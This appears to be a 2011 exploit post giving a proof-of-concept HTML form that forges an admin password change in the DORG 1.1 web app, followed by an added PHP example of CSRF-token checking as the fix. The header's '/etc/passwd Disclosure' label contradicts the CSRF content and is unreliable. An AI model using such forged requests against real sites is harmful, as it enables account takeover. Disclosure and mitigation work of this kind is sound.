Friday, 6 May 2011

DORG 1.1 <= Cross-Site Request Forgery (CSRF) PoC Exploit

~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : DORG1.1
|~Price : N/A
|~Version : N/A
|~Vulnerability Style : /etc/passwd Disclosure
|~Vulnerability Dir : /
|~Google Keyword : N/A
|[~]Date : "06.05.2011"
|[~]Tested on : Official Demo ; http://demo.opensourcecms.com/dorg/
----------------------------------------------------------
users.php <= session handling is not secure

Admin password change CSRF PoC:
 
    ================================================================
     
                <form action='http://demo.opensourcecms.com/dorg/admin_panel/users.php?page=2&id=1' method="POST">
                        <table>
                                <tr>
                                        <td>Username: </td>
                                        <td><strong>admin</strong></td>
                                </tr>
                                <tr><td colspan='2'><!----></td></tr>
                                <tr>
                                        <td>Active?</td>
                                        <td><strong>yes</strong></td>
                                </tr>
                                <tr><td colspan='2'><br /></td></tr>
                                <tr>
                                        <td><label for="new_pw">New password:</label></td>
                                        <td><input type="password" name="new_pw" id="new_pw" /></td>
                                </tr>
                                <tr>
                                        <td><label for="new_pw_c">New password (confirmation):</label></td>
                                        <td><input type="password" name="new_pw_c" id="new_pw_c" /></td>
                                </tr>
                                <tr><td colspan='2'><i>Your password will be encrypted</i></td></tr>
                                <tr><td colspan='2'><br /></td></tr>
                                <tr><td colspan='2'><input type='submit' name='submit' value='Update' />&nbsp;-&nbsp;or&nbsp;-&nbsp;<input type='submit' name='submit' value='Deactivate User' /></td></tr>
                        </table>
                </form>
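
The server-side check whose absence lets the form above work, as an added example (not DORG's code and not part of the original post): a session-bound anti-CSRF token verified before the password change is processed. The field names `new_pw` and `new_pw_c` come from the form above; `csrf_token`, `issue_csrf_token()` and `verify_csrf_token()` are hypothetical names, and storing the hash is left to the application.

```php
<?php
// Added example, not DORG's own code. Assumes PHP 7.3+.
// SameSite is defence in depth; the token check below is the actual control.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Hypothetical helper: create one random token per session and reuse it.
function issue_csrf_token()
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hypothetical helper: constant-time comparison; non-string input
// (e.g. csrf_token[]=x) and an empty session token are both rejected.
function verify_csrf_token($submitted)
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return is_string($submitted) && $expected !== ''
        && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // Reject cross-site posts before touching any account data.
    if (!verify_csrf_token($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
    $pw  = $_POST['new_pw'] ?? '';
    $pwc = $_POST['new_pw_c'] ?? '';
    if (!is_string($pw) || $pw === '' || $pw !== $pwc) {
        http_response_code(400);
        exit('Passwords missing or not matching');
    }
    unset($_SESSION['csrf_token']);            // rotate after a state change
    $hash = password_hash($pw, PASSWORD_DEFAULT);
    // Store $hash for the authenticated user here (application-specific).
    exit('Password updated');
}
?>
<form action="" method="POST">
    <input type="hidden" name="csrf_token"
           value="<?= htmlspecialchars(issue_csrf_token(), ENT_QUOTES) ?>" />
    <input type="password" name="new_pw" />
    <input type="password" name="new_pw_c" />
    <input type="submit" name="submit" value="Update" />
</form>
```

Requiring the current password in the same request adds a second barrier that a forged cross-site post cannot satisfy.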
 
